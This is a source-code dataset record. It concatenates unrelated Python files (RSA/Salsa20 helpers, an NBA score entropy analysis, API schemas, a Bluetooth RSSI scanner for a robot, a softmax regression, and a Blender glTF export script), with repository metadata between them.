# Date: 06/02/2018 # Author: Pure-L0G1C # Description: Encryption/Decryption from Crypto.PublicKey import RSA from base64 import b64encode, b64decode from Crypto.Random import get_random_bytes from Crypto.Cipher import Salsa20, PKCS1_OAEP class CryptoRSA(object): @staticmethod def generate_keys(): key = RSA.generate(4096) private_key = key.export_key() public_key = key.publickey().export_key() return public_key, private_key @staticmethod def encrypt(rec_publ_key, data): recipient_key = RSA.import_key(rec_publ_key) cipher_rsa = PKCS1_OAEP.new(recipient_key) return cipher_rsa.encrypt(data) @staticmethod def decrypt(priv_key, data): key = RSA.import_key(priv_key) cipher_rsa = PKCS1_OAEP.new(key) return cipher_rsa.decrypt(data) class CryptoSalsa20(object): @staticmethod def generate_key(): return get_random_bytes(32) @classmethod def encrypt(cls, data, key=None): key = cls.generate_key() if not key else key cipher = Salsa20.new(key=key) return b64encode(cipher.encrypt(data)), b64encode(key), b64encode(cipher.nonce) @staticmethod def decrypt(ciphertext, key, nonce): ciphertext, key, nonce = [b64decode(_) for _ in [ciphertext, key, nonce]] cipher = Salsa20.new(key=key, nonce=nonce) return cipher.decrypt(ciphertext)
27.770833
82
0.733683
d0a500b2a07db8ae743eec79ff0d8f00f3aac617
6,731
py
Python
test/demonst_4_nba.py
saeyoung/tslb
5f52646260e14f44c61a670cfc75509951e5e794
[ "MIT" ]
null
null
null
test/demonst_4_nba.py
saeyoung/tslb
5f52646260e14f44c61a670cfc75509951e5e794
[ "MIT" ]
3
2020-03-24T18:18:21.000Z
2021-08-23T20:37:09.000Z
test/demonst_4_nba.py
saeyoung/tslb
5f52646260e14f44c61a670cfc75509951e5e794
[ "MIT" ]
null
null
null
############################################################# # # Real-world Data 4. NBA # ############################################################# import sys, os sys.path.append("../..") sys.path.append("..") sys.path.append(os.getcwd()) import numpy as np import pandas as pd import copy import pickle from math import log, e from sklearn.linear_model import LinearRegression from numpy.linalg import eig from tslb.src.lzw import * from tslb.src.utils import * from tslb.src.regModel import regModel as regModel def get_first_diff(seq): return (seq.shift(-1) - seq).values[:-1].astype(int) def get_year(df, yr=213): return df[(df.nbaId > yr*100000) & (df.nbaId < (yr+1)*100000)] def get_matrix(df, fr='5S'): df_int = df.copy() df_int = df_int[df_int.TIME_INT.shift(-1) != df_int.TIME_INT] # remove the rows with the same TIME_INT ### Create Matrix only with Q1-Q4 # 1230 rows : 1230 games in total # 193 columns : 48 mins (4 Quarters) / 15 secs interval # only quarter 4 df_q4 = df_int[df_int.TIME_INT <= pd.to_timedelta("00:48:00")] df_q4.loc[:,'TIME_INT'] = pd.to_datetime(df_q4.loc[:,'TIME_INT']) # time_index = pd.timedelta_range(start = pd.to_timedelta("00:00:00"), end = pd.to_timedelta("00:48:00"), freq='15s') df_q4_home = pd.pivot_table(df_q4, values='HOME_SCORE', columns=['nbaId'],index=['TIME_INT']) df_q4_home = df_q4_home.fillna(method = 'ffill') df_q4_home = df_q4_home.asfreq(freq=fr, method='ffill') df_q4_away = pd.pivot_table(df_q4, values='AWAY_SCORE', columns=['nbaId'],index=['TIME_INT']) df_q4_away = df_q4_away.fillna(method = 'ffill') df_q4_away = df_q4_away.asfreq(freq=fr, method='ffill') df_q4_home = df_q4_home.T df_q4_away = df_q4_away.T return df_q4_home, df_q4_away def import_data(fr = '15S', yr = 214): df = pd.read_pickle("../data/nba_scores_2103-2018.pkl") df_q4_home, df_q4_away = get_matrix(get_year(df, yr=yr), fr=fr) df_q4 = pd.concat([df_q4_home, df_q4_away]) return df_q4 def plot_data(): df_q4 = import_data(fr = '15S', yr = 214) score = 
df_q4.iloc[0,:] plt.title("NBA game score") plt.plot(score.values) plt.xlabel("time") plt.ylabel("score") plt.savefig("result/nba_score.pdf", format='pdf') plt.show() plt.title("NBA game score difference (15s interval)") plt.scatter(range(len(get_first_diff(score))),get_first_diff(score)) plt.xlabel("time") plt.ylabel("score") plt.savefig("result/nba_score_diff.pdf", format='pdf') plt.show() def year_test(df, fr = '15S', yr = 213): ##### df_q4_home, df_q4_away = get_matrix(get_year(df, yr=yr), fr=fr) samples = 100 size = df_q4_home.shape[1]-1 myRegModel3 = regModel(3, size, samples) myRegModel4 = regModel(4, size, samples) myRegModel5 = regModel(5, size, samples) myRegModel6 = regModel(6, size, samples) myRegModel7 = regModel(7, size, samples) myRegModel3.fit(plot=False) myRegModel4.fit(plot=False) myRegModel5.fit(plot=False) myRegModel6.fit(plot=False) myRegModel7.fit(plot=False) lbs_home=[] for i in range(df_q4_home.shape[0]): seq = df_q4_home.astype(int).iloc[i] uncomp_numbers = get_first_diff(seq) n = max(uncomp_numbers)+1 print(n) if n==3: myRegModel = myRegModel3 elif n==4: myRegModel = myRegModel4 elif n==5: myRegModel = myRegModel5 elif n==6: myRegModel = myRegModel6 elif n==7: myRegModel = myRegModel7 if np.sum(uncomp_numbers <0) !=0: continue ratio = lzw_compression_ratio(uncomp_numbers, n) ent = myRegModel.get_entropy(ratio, "a multinomial sequence", False) lb = h_inverse(ent, n, a=0.001) lbs_home.append(lb) lbs_away=[] for i in range(df_q4_away.shape[0]): seq = df_q4_away.astype(int).iloc[i] uncomp_numbers = get_first_diff(seq) n = max(uncomp_numbers)+1 print(n) if n==3: myRegModel = myRegModel3 elif n==4: myRegModel = myRegModel4 elif n==5: myRegModel = myRegModel5 elif n==6: myRegModel = myRegModel6 elif n==7: myRegModel = myRegModel7 if np.sum(uncomp_numbers <0) !=0: continue ratio = lzw_compression_ratio(uncomp_numbers, n) ent = myRegModel.get_entropy(ratio, "a multinomial sequence", False) lb = h_inverse(ent, n, a=0.001) lbs_away.append(lb) lbs = 
np.append(np.array(lbs_home), np.array(lbs_away)) lbs_df = pd.DataFrame(lbs, columns=[yr]) return lbs_df def save_data(): df = pd.read_pickle("../data/nba_scores_2103-2018.pkl") lbs_df_all = pd.DataFrame() for yr in [213,214,215,216,217,218]: # for yr in [213,214]: lbs_df = year_test(df, fr = '15S', yr = yr) lbs_df_all = pd.concat([lbs_df_all, lbs_df], axis=1) print(lbs_df_all) lbs_df_all.to_pickle("lbs_df_all.pkl") def plot_hist(lbs, year): m = round(np.mean(lbs),3) plt.title("Error lower bound histogram \n NBA season {}".format(year)) plt.hist(lbs) plt.axvline(np.mean(lbs), color='red', label="mean = {}".format(m)) plt.xlim(0,1) plt.xlabel("classification error") plt.legend() plt.savefig("result/nba_hist_{}.pdf".format(year), format='pdf') plt.show() print("mean : ", np.mean(lbs)) print("median : ", np.median(lbs)) print("min : ", np.min(lbs)) print("max : ", np.max(lbs)) print("std : ", np.std(lbs)) def main(): print("*******************************************************") print("*******************************************************") print("********** Running the Testing Scripts. ***************") plt.rcParams.update({'font.size': 14}) plt.rcParams.update({'figure.autolayout': True}) # save_data() lbs_df_all = pd.read_pickle("lbs_df_all.pkl") plot_hist(lbs_df_all[213], 2013) plot_hist(lbs_df_all[218], 2018) # box plot lbs_df_all.columns=["2013","2014","2015","2016", "2017", "2018"] plt.title("P(e) distribution per season") lbs_df_all.boxplot() plt.xlabel("season") plt.ylabel("probability of error") # plt.ylim(0.1,0.4) plt.savefig("result/nba_box.pdf", format='pdf') plt.show() print("********** Testing Scripts Done. **********************") print("*******************************************************") print("*******************************************************") if __name__ == "__main__": main()
30.595455
121
0.584609
d0d7db0a1ae0211e4a93003ccc794d34f0b8ed0d
2,046
py
Python
project/api/push_registration/schemas.py
DanielGrams/cityservice
c487c34b5ba6541dcb441fe903ab2012c2256893
[ "MIT" ]
null
null
null
project/api/push_registration/schemas.py
DanielGrams/cityservice
c487c34b5ba6541dcb441fe903ab2012c2256893
[ "MIT" ]
35
2022-01-24T22:15:59.000Z
2022-03-31T15:01:35.000Z
project/api/push_registration/schemas.py
DanielGrams/cityservice
c487c34b5ba6541dcb441fe903ab2012c2256893
[ "MIT" ]
null
null
null
from marshmallow import fields, validate from marshmallow_enum import EnumField from project.api import marshmallow from project.api.schemas import ( IdSchemaMixin, PaginationRequestSchema, PaginationResponseSchema, SQLAlchemyBaseSchema, TrackableSchemaMixin, WriteIdSchemaMixin, ) from project.models import PushPlatform, PushRegistration class PushRegistrationModelSchema(SQLAlchemyBaseSchema): class Meta: model = PushRegistration load_instance = True class PushRegistrationIdSchema(PushRegistrationModelSchema, IdSchemaMixin): pass class PushRegistrationWriteIdSchema(PushRegistrationModelSchema, WriteIdSchemaMixin): pass class PushRegistrationBaseSchemaMixin(TrackableSchemaMixin): device = marshmallow.auto_field( required=True, validate=validate.Length(min=3, max=255) ) platform = EnumField(PushPlatform) token = marshmallow.auto_field(required=True) class PushRegistrationSchema(PushRegistrationIdSchema, PushRegistrationBaseSchemaMixin): pass class PushRegistrationRefSchema(PushRegistrationIdSchema): device = marshmallow.auto_field() platform = EnumField(PushPlatform) class PushRegistrationListRequestSchema(PaginationRequestSchema): token = fields.Str() class PushRegistrationListItemSchema(PushRegistrationRefSchema): token = marshmallow.auto_field() class PushRegistrationListResponseSchema(PaginationResponseSchema): items = fields.List( fields.Nested(PushRegistrationListItemSchema), metadata={"description": "Push registrations"}, ) class PushRegistrationPostRequestSchema( PushRegistrationModelSchema, PushRegistrationBaseSchemaMixin ): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.make_post_schema() class PushRegistrationPatchRequestSchema( PushRegistrationModelSchema, PushRegistrationBaseSchemaMixin ): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.make_patch_schema()
26.921053
88
0.776637
ef4129fc1359955e99c61603c6a5cca46844bb29
9,561
py
Python
code/sensors/bluetooth/bluetooth.py
dieterpl/iDogstra
62ee246763e107335b9caf0a4f96239fa0953234
[ "MIT" ]
null
null
null
code/sensors/bluetooth/bluetooth.py
dieterpl/iDogstra
62ee246763e107335b9caf0a4f96239fa0953234
[ "MIT" ]
null
null
null
code/sensors/bluetooth/bluetooth.py
dieterpl/iDogstra
62ee246763e107335b9caf0a4f96239fa0953234
[ "MIT" ]
null
null
null
# BLE Scanner based on https://github.com/switchdoclabs/iBeacon-Scanner-/blob/master/blescan.py # BLE = Bluetooth Low Energy import os import sys import struct import bluetooth._bluetooth as bluez import math import time import logging from enum import Enum from collections import deque, namedtuple from threading import Thread, Lock import config from utils.functions import current_time_millis, overrides from sensors.pipeline import Pipeline OGF_LE_CTL = 0x08 OCF_LE_SET_SCAN_ENABLE = 0x000C LE_META_EVENT = 0x3e EVT_LE_CONN_COMPLETE = 0x01 EVT_LE_ADVERTISING_REPORT = 0x02 # Named tuple that represents the data that the ble scan returns FindResult = namedtuple("FindResult", "uuid rssi") def returnstringpacket(pkt): """Returns a packet as hex string""" myString = "" for c in pkt: myString += "%02x" % c return myString def parse_events(sock, target_uuid, loop_count=100): """Parses the events that the bluetooth socket recieves""" old_filter = sock.getsockopt(bluez.SOL_HCI, bluez.HCI_FILTER, 14) flt = bluez.hci_filter_new() bluez.hci_filter_all_events(flt) bluez.hci_filter_set_ptype(flt, bluez.HCI_EVENT_PKT) sock.setsockopt(bluez.SOL_HCI, bluez.HCI_FILTER, flt) result = None for i in range(0, loop_count): pkt = sock.recv(255) ptype, event, plen = struct.unpack("BBB", pkt[:3]) if event == LE_META_EVENT: subevent = pkt[3] pkt = pkt[4:] if subevent == EVT_LE_ADVERTISING_REPORT: num_reports = pkt[0] report_pkt_offset = 0 for i in range(0, num_reports): uuid = returnstringpacket( pkt[report_pkt_offset - 22: report_pkt_offset - 6]) rssi = struct.unpack("b", pkt[report_pkt_offset - 1:])[0] if uuid == target_uuid: result = FindResult(uuid, rssi) break else: continue break sock.setsockopt(bluez.SOL_HCI, bluez.HCI_FILTER, old_filter) return result # A named tuple that defines how the received rssi values are stored. # Note that the rssi value is negative, whereas the data in this # tuple will be positive. 
DataTuple = namedtuple("DataTuple", "time strength") class DataList: """This is a snapshot of the bt dongle data. It contains multiple values in a list and provides convenience methods to analyse the data""" def __init__(self, threshold, data_list): """threshold is the amount of time this snapshot is representing. data_list is the list of DataTuple's""" self.threshold = threshold self.data_list = data_list def __len__(self): """Returns the amount of data this snapshot contains""" return len(self.data_list) def avg(self): """Returns the average of all values""" s = 0 for _, strength in self.data_list: s += strength count = len(self) return s / count if count > 0 else 0 def variance(self): """Returns the variance of all values""" s = 0 avg = self.avg() for _, strength in self.data_list: s += (strength - avg)**2 count = len(self) return s / count if count > 0 else 0 def standard_deviation(self): """Returns the standard deviation of all values. Equivalent to math.sqrt(self.variance())""" return math.sqrt(self.variance()) class BTDongle: """Manages a single bluetooth dongle and stores the received data. The data is stored in a double ended queue (deque) which allows accessing the newest and oldest data in a very efficient way. 
For performance reasons older data is being deleted, each time, new data is inserted.""" def __init__(self, dev_id, target): self.dev_id = dev_id self.target = target self.sock = None self.data = deque() self.lock = Lock() self.current = 0 self.thread = Thread(target=self.scan_loop) self.offset = 0 def start(self): """Initializes the bluetooth socket, and starts reading rssi values in a new thread""" # Open the bt socket self.sock = bluez.hci_open_dev(self.dev_id) # Enable ble scan bluez.hci_send_cmd( self.sock, OGF_LE_CTL, OCF_LE_SET_SCAN_ENABLE, struct.pack("<BB", 0x01, 0x00)) # Start scanning in a new thread self.thread.start() def remove_old_data(self, threshold=10000): """Removes data tuples from the queue that are older than threshold milliseconds""" threshold = current_time_millis() - threshold try: self.lock.acquire() while(len(self.data) > 0 and self.data[0].time < threshold): self.data.popleft() finally: self.lock.release() def add_data(self, rssi): """Adds a new rssi value. This also calls self.remove_old_data()""" # Positive rssi values are very rare, and indicate a very # good connection. We simplify this by setting the value to # 0, which indicates the best possible strength in our terms. if rssi > 0: rssi = 0 # Remove old entries from the queue that are older than 10 sec self.remove_old_data() # Add the new rssi value to the data queue try: self.lock.acquire() self.data.append(DataTuple( current_time_millis(), abs(rssi) + self.offset)) finally: self.lock.release() def scan(self): """Scans a single time for ble beacons""" result = parse_events(self.sock, self.target, loop_count=10) if result != None: self.add_data(result.rssi) def scan_loop(self): """Scans in a loop for ble beacons. Simply calls self.scan() in a while True loop""" while True: self.scan() def snapshot_data(self): """Returns a snapshot of the data in form of a DataList object. 
This contains all data that has been collected in the last threshold milliseconds""" threshold = current_time_millis() - config.BT_TIME_THRESHOLD data_list = [] try: self.lock.acquire() for t in reversed(self.data): # Stop when data is too old if t.time < threshold: break data_list.append(t) finally: self.lock.release() return DataList(threshold, data_list) class SnapshotBTDataPipeline(Pipeline): """A pipeline that takes a list of BTDongle objects and extracts a snapshot of the collected data""" def __init__(self): Pipeline.__init__(self) @overrides(Pipeline) def _execute(self, inp): """Takes a list of BTDongle objects and returns a list of DataList objects which are a snapshot of the collected bluetooth data""" if len(inp) == 0: return (False, None) return (True, [dongle.snapshot_data() for dongle in inp]) class RecommendedSpeedPipeline(Pipeline): """A pipeline that takes multiple DataList objects and recommends a speed for the roboter based on the signal strenght""" def __init__(self): Pipeline.__init__(self) self.min_speed = config.BT_MIN_SPEED self.threshold = config.BT_MOVEMENT_RSSI_THRESHOLD self.multiplier = config.BT_MULTIPLIER @overrides(Pipeline) def _execute(self, inp): """Takes a list of DataList objects, and returns the recommended speed in the interval [0;100]""" if len(inp) == 0: return (False, None) data_count = sum(len(data) for data in inp) logging.debug("data_count=" + str(data_count)) if data_count == 0: return (False, None) avg_strength = sum(data.avg() for data in inp) / len(inp) logging.info("avg_strength=" + str(avg_strength)) speed = 0 if avg_strength >= self.threshold: speed = min(100, self.min_speed + self.multiplier * (avg_strength - self.threshold)) return (True, speed) class UserDistanceEstimationPipeline(Pipeline): """A pipeline that return the distance of the user in three areas far, medium, near""" class Distance(Enum): FAR = 3 MEDIUM = 2 NEAR = 1 def __init__(self): Pipeline.__init__(self) self.far_threshold = 
config.BT_DISTANCE_THRESHOLDS["far"] self.medium_threshold = config.BT_DISTANCE_THRESHOLDS["medium"] self.near_thresholds = config.BT_DISTANCE_THRESHOLDS["near"] @overrides(Pipeline) def _execute(self, inp): """Takes a list of DataList objects, and returns the recommended speed in the interval [0;100]""" if len(inp) == 0: return (False, None) data_count = sum(len(data) for data in inp) logging.debug("data_count=" + str(data_count)) if data_count == 0: return (False, None) avg_strength = sum(data.avg() for data in inp) / len(inp) logging.info("avg_strength=" + str(avg_strength)) if avg_strength > self.far_threshold: return True, self.Distance.FAR if avg_strength > self.medium_threshold: return True, self.Distance.MEDIUM return True, self.Distance.NEAR
32.85567
95
0.62368
328cb6307f70f83df483c16ebad3fab11c697ef4
2,824
py
Python
src/lecture2/logistic_regression/naive_softmax_regression.py
Fassial/zju-intern
f421f9c97d3c567e9b97121c5bf5c675c9e2c721
[ "MIT" ]
1
2020-08-17T07:09:09.000Z
2020-08-17T07:09:09.000Z
src/lecture2/logistic_regression/naive_softmax_regression.py
Fassial/zju-intern
f421f9c97d3c567e9b97121c5bf5c675c9e2c721
[ "MIT" ]
null
null
null
src/lecture2/logistic_regression/naive_softmax_regression.py
Fassial/zju-intern
f421f9c97d3c567e9b97121c5bf5c675c9e2c721
[ "MIT" ]
2
2020-07-26T07:27:57.000Z
2020-08-17T07:09:15.000Z
""" Created on August 02 00:06, 2020 @author: fassial """ import numpy as np import matplotlib.pyplot as plt # local dep import .utils def load_dataset(file_path): dataMat = [] labelMat = [] fr = open(file_path) for line in fr.readlines(): lineArr = line.strip().split() dataMat.append([1.0, float(lineArr[0]), float(lineArr[1])]) labelMat.append(int(lineArr[2])) return dataMat, labelMat def train(data_arr, label_arr, n_class, iters = 1000, alpha = 0.1, lam = 0.01): ''' @description: softmax 训练函数 @param {type} @return: theta 参数 ''' n_samples, n_features = data_arr.shape n_classes = n_class # 随机初始化权重矩阵 weights = np.random.rand(n_class, n_features) # 定义损失结果 all_loss = list() # 计算 one-hot 矩阵 y_one_hot = one_hot(label_arr, n_samples, n_classes) for i in range(iters): # 计算 m * k 的分数矩阵 scores = np.dot(data_arr, weights.T) # 计算 softmax 的值 probs = softmax(scores) # 计算损失函数值 loss = - (1.0 / n_samples) * np.sum(y_one_hot * np.log(probs)) all_loss.append(loss) # 求解梯度 dw = -(1.0 / n_samples) * np.dot((y_one_hot - probs).T, data_arr) + lam * weights dw[:,0] = dw[:,0] - lam * weights[:,0] # 更新权重矩阵 weights = weights - alpha * dw if i % 10 == 0: print("iter:", i, ",accu:", np.sum(np.argmax(probs, axis=1).reshape((-1,1)) == label_arr)/label_arr.shape[0]) return weights, all_loss def softmax(scores): # 计算总和 sum_exp = np.sum(np.exp(scores), axis = 1,keepdims = True) softmax = np.exp(scores) / sum_exp return softmax def one_hot(label_arr, n_samples, n_classes): one_hot = np.zeros((n_samples, n_classes)) one_hot[np.arange(n_samples), label_arr.T] = 1 return one_hot def predict(test_dataset, label_arr, weights): scores = np.dot(test_dataset, weights.T) probs = softmax(scores) return np.argmax(probs, axis=1).reshape((-1,1)) DATASET = 'mnist.pkl.gz' if __name__ == "__main__": # get datasets datasets = utils.load_data(dataset = DATASET) (x_train, y_train), (x_valid, y_valid), (x_test, y_test) = datasets #gen_dataset() data_arr, label_arr = x_train, y_train.reshape((-1,1)) weights, all_loss = 
train(data_arr, label_arr, n_class = 10) # 计算预测的准确率 test_data_arr, test_label_arr = x_test, y_test.reshape((-1,1)) n_test_samples = test_data_arr.shape[0] y_predict = predict(test_data_arr, test_label_arr, weights) accuray = np.sum(y_predict == test_label_arr) / n_test_samples print(accuray) # 绘制损失函数 fig = plt.figure(figsize=(8,5)) plt.plot(np.arange(1000), all_loss) plt.title("Development of loss during training") plt.xlabel("Number of iterations") plt.ylabel("Loss") plt.show()
30.695652
133
0.632436
de502f0d7295c12268e568b5024a69d8b04cd49a
196
py
Python
ib_connection/IBConnector.py
nic-fillion/SMALET
011844a2ee23383f4cbd9df4f394de086f873fc6
[ "MIT" ]
null
null
null
ib_connection/IBConnector.py
nic-fillion/SMALET
011844a2ee23383f4cbd9df4f394de086f873fc6
[ "MIT" ]
null
null
null
ib_connection/IBConnector.py
nic-fillion/SMALET
011844a2ee23383f4cbd9df4f394de086f873fc6
[ "MIT" ]
null
null
null
from threading import Thread import logging class IBConnector: def __init__(self, app): self.thread = Thread( target=self.run, name='IB connector', )
17.818182
32
0.591837
dec2f2a79acc00ab4ec810defae9b44030b079a9
5,812
py
Python
contents/blender_export.py
cutec-chris/sce
da1f906ff4a049722b8968eeab8a07b411c92a8c
[ "MIT" ]
null
null
null
contents/blender_export.py
cutec-chris/sce
da1f906ff4a049722b8968eeab8a07b411c92a8c
[ "MIT" ]
null
null
null
contents/blender_export.py
cutec-chris/sce
da1f906ff4a049722b8968eeab8a07b411c92a8c
[ "MIT" ]
null
null
null
import bpy,pathlib,mathutils,math,os


def IsNewer(File1,File2):
    """Return True when File1 is OLDER than File2 (by mtime), or when either
    file cannot be stat'ed (e.g. the target does not exist yet).

    NOTE(review): the name is misleading — callers use it as "is the export
    target stale and in need of regeneration".
    """
    try:
        return os.path.getmtime(str(File1))<os.path.getmtime(str(File2))
    except:
        # Missing target (or any stat error) forces a rebuild.
        return True


def ExportObject(File,Object,TargetName,lod=[10],lod_ligthing=50,**kwargs):
    """Export one named collection of a .blend file to glTF, optionally with
    a billboard LOD.

    :param File: path of the .blend file to open
    :param Object: name of the collection to export; all other collections
        are hidden from viewport/selection/render before export
    :param TargetName: output basename; '<TargetName>_10.glb' is the full
        mesh, '<TargetName>_0.glb' the two-plane billboard LOD
    :param lod: which LOD levels to produce (10 = full mesh, 0 = billboard)
    :param lod_ligthing: area-light energy used when rendering the billboard
        textures (parameter name keeps the original typo for compatibility)
    :param kwargs: forwarded to bpy.ops.export_scene.gltf

    NOTE(review): the mutable default `lod=[10]` is never mutated here, so it
    is harmless, but a tuple default would be safer.
    """
    File = pathlib.Path(File)
    # Skip entirely when the exported .glb is newer than the source .blend.
    if IsNewer(TargetName+'_10.glb',File):
        bpy.ops.wm.open_mainfile(filepath=str(File.absolute()))
        for collection in bpy.data.collections:
            # Hide every collection that is not the export target.
            collection.hide_viewport = collection.name != Object
            collection.hide_select = collection.name != Object
            collection.hide_render = collection.name != Object
            if collection.name == Object:
                print(collection.name)
                target_obj = collection
                for obj in collection.all_objects:
                    print(" obj: ", obj.name)
                    # NOTE(review): after the loop target_obj is the LAST
                    # object of the collection — presumably the collection
                    # holds a single object; verify for multi-object input.
                    target_obj = obj
        if 10 in lod:
            # use_visible=True exports only the unhidden target collection.
            bpy.ops.export_scene.gltf(filepath=TargetName+'_10.glb',use_visible=True,export_cameras=False,export_apply=True,**kwargs)
        if 0 in lod and (IsNewer(TargetName+'_0.glb',File)):
            GenerateLOD0Object(target_obj,TargetName,lod_ligthing=lod_ligthing)
        #bpy.ops.wm.save_mainfile(filepath=str(File.absolute())+'out.blend')


def GenerateLOD0Object(target_obj,TargetName,Resolution=400,Blending='CLIP',lod_ligthing=50):
    """Build a 2-plane billboard LOD for `target_obj` and export it as
    '<TargetName>_0.glb'.

    Renders the object twice with an orthographic camera (front and side),
    maps the renders onto two crossed planes with alpha-clipped materials,
    then exports the planes. The temporary PNGs are deleted afterwards.

    :param target_obj: object whose bound_box drives camera framing
    :param Resolution: square render resolution for the billboard textures
    :param Blending: material blend_method ('CLIP' by default)
    :param lod_ligthing: energy of the area light used for the renders
    """
    # remove default light
    bpy.ops.object.select_by_type(type='LIGHT')
    bpy.ops.object.delete(use_global=False)
    # add light
    bpy.ops.object.light_add(type='AREA')
    light = bpy.context.object
    light.data.energy = lod_ligthing
    # add camera for rendering
    bpy.ops.object.camera_add()
    bpy.data.cameras['Camera'].type = 'ORTHO'
    camera_object = bpy.data.objects['Camera']
    # Bounding-box center: mean of the 8 bound_box corners (local space).
    center = sum((mathutils.Vector(b) for b in target_obj.bound_box), mathutils.Vector())/8
    bpy.data.cameras['Camera'].ortho_scale = 20
    pmw = target_obj.matrix_world
    # World-space corner coordinates, flattened for camera_fit_coords.
    coords = [t for b in target_obj.bound_box for t in pmw @ mathutils.Vector(b)]
    # render 2 images from object
    bpy.context.scene.render.film_transparent = True
    bpy.context.scene.render.image_settings.color_mode = 'RGBA'
    for scene in bpy.data.scenes:
        scene.render.resolution_x = Resolution
        scene.render.resolution_y = Resolution
        #scene.render.image_settings.file_format = 'JPEG'
    # First view: camera looking along -X (rotated -90° around Z).
    camera_object.location = center
    camera_object.rotation_euler = (math.radians(90), 0, math.radians(-90))
    # Let Blender move the camera/scale so the whole bound box is framed.
    v, scale = camera_object.camera_fit_coords(bpy.context.evaluated_depsgraph_get(), coords)
    camera_object.location = v
    light.location = v
    light.rotation_euler = camera_object.rotation_euler
    bpy.data.cameras['Camera'].ortho_scale = scale
    bpy.context.scene.camera = camera_object
    bpy.context.scene.render.filepath = "orthogonal1.png"
    bpy.ops.render.render(write_still = True)
    # Second view: camera looking along -Y (no Z rotation).
    camera_object.location = center
    camera_object.rotation_euler = (math.radians(90), 0, 0)
    v, scale = camera_object.camera_fit_coords(bpy.context.evaluated_depsgraph_get(), coords)
    camera_object.location = v
    light.location = v
    light.rotation_euler = camera_object.rotation_euler
    bpy.data.cameras['Camera'].ortho_scale = scale
    bpy.context.scene.camera = camera_object
    bpy.context.scene.render.filepath = "orthogonal2.png"
    bpy.ops.render.render(write_still = True)
    # generate 2 planes with the images
    target_obj.hide_viewport = True
    bpy.ops.mesh.primitive_plane_add(
        size=2, calc_uvs=True, enter_editmode=False, align='WORLD', location=(0, 0, 0))
    # New planes are always named 'Plane'; rename immediately so the second
    # primitive_plane_add below gets the plain 'Plane' name again.
    bpy.data.objects['Plane'].name = 'Plane1'
    bpy.data.objects['Plane1'].rotation_euler=(math.radians(90), 0, math.radians(90))
    bpy.data.materials.new('Mat1')
    mat1 = bpy.data.materials['Mat1']
    mat1.use_nodes = True
    mat1.blend_method = Blending
    tex1 = mat1.node_tree.nodes.new('ShaderNodeTexImage')
    img1 = bpy.data.images.load('orthogonal1.png')
    tex1.image = img1
    # Wire the render into Base Color and its alpha channel into Alpha.
    mat1.node_tree.links.new(mat1.node_tree.nodes['Principled BSDF'].inputs['Base Color'], tex1.outputs[0])
    mat1.node_tree.links.new(mat1.node_tree.nodes['Principled BSDF'].inputs['Alpha'], tex1.outputs[1])
    # Kill specular highlights on the flat billboard.
    mat1.node_tree.nodes['Principled BSDF'].inputs['Specular'].default_value = 0.0
    print(mat1.node_tree.nodes['Principled BSDF'].inputs['Specular'])
    bpy.data.objects['Plane1'].active_material = mat1
    bpy.ops.mesh.primitive_plane_add(
        size=2, calc_uvs=True, enter_editmode=False, align='WORLD', location=(0, 0, 0))
    bpy.data.objects['Plane'].name = 'Plane2'
    bpy.data.objects['Plane2'].rotation_euler=(math.radians(90), 0, 0)
    bpy.data.materials.new('Mat2')
    mat2 = bpy.data.materials['Mat2']
    mat2.use_nodes = True
    mat2.blend_method = Blending
    tex2 = mat2.node_tree.nodes.new('ShaderNodeTexImage')
    img2 = bpy.data.images.load('orthogonal2.png')
    tex2.image = img2
    mat2.node_tree.links.new(mat2.node_tree.nodes['Principled BSDF'].inputs['Base Color'], tex2.outputs[0])
    mat2.node_tree.links.new(mat2.node_tree.nodes['Principled BSDF'].inputs['Alpha'], tex2.outputs[1])
    mat2.node_tree.nodes['Principled BSDF'].inputs['Specular'].default_value = 0.0
    print(mat2.node_tree.nodes['Principled BSDF'].inputs['Specular'])
    bpy.data.objects['Plane2'].active_material = mat2
    # Export only the visible billboard planes (target_obj is hidden above).
    bpy.ops.export_scene.gltf(filepath=TargetName+'_0.glb',use_visible=True,export_cameras=False,export_apply=True)
    os.remove('orthogonal1.png')
    os.remove('orthogonal2.png')
    # https://blender.stackexchange.com/questions/130404/script-to-render-one-object-from-different-angles
    # https://blender.stackexchange.com/questions/128185/check-if-the-whole-plane-is-being-on-a-orthographic-camera-render-or-get-a-prop
47.252033
135
0.69563
deecb14b27d4af6713c4acee70d3adf22146b73f
527
py
Python
Utils/py/naoth/naoth/__init__.py
tarsoly/NaoTH
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
Utils/py/naoth/naoth/__init__.py
tarsoly/NaoTH
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
Utils/py/naoth/naoth/__init__.py
tarsoly/NaoTH
dcd2b67ef6bf9953c81d3e1b26e543b5922b7d52
[ "ECL-2.0", "Apache-2.0" ]
null
null
null
import sys, os

# Package init: wires up sys.path so sibling modules and the native
# framework's bundled site-packages (OpenCV) can be imported, then
# re-exports the public classes.

# add the current directory to search path (LogReader/SPLMessage live here)
sys.path.append(os.path.dirname(__file__))

# add Framework stuff (opencv) to search path
versionPart = 'python2.7' if sys.version_info[0] == 2 else 'python3.6'
# BUG FIX: os.getenv returns None when EXTERN_PATH_NATIVE is unset, and
# os.path.join(None, ...) raises TypeError — guard before joining so the
# package still imports in environments without the native framework.
externPath = os.getenv('EXTERN_PATH_NATIVE')
if externPath:
    fwPath = os.path.join(externPath, 'lib', versionPart, 'site-packages')
    if os.path.exists(fwPath):
        sys.path.append(fwPath)

# import some of our classes
from LogReader import LogReader, Parser
from SPLMessage import SPLMessage, MixedTeamMessage
from .BehaviorParser import BehaviorParser
35.133333
90
0.779886
19c29815db5e30f915c77de92c8ca4fd10a94afa
3,969
py
Python
test/test_npu/test_triangular_solve.py
Ascend/pytorch
39849cf72dafe8d2fb68bd1679d8fd54ad60fcfc
[ "BSD-3-Clause" ]
1
2021-12-02T03:07:35.000Z
2021-12-02T03:07:35.000Z
test/test_npu/test_triangular_solve.py
Ascend/pytorch
39849cf72dafe8d2fb68bd1679d8fd54ad60fcfc
[ "BSD-3-Clause" ]
1
2021-11-12T07:23:03.000Z
2021-11-12T08:28:13.000Z
test/test_npu/test_triangular_solve.py
Ascend/pytorch
39849cf72dafe8d2fb68bd1679d8fd54ad60fcfc
[ "BSD-3-Clause" ]
null
null
null
# Copyright (c) 2020, Huawei Technologies.All rights reserved.
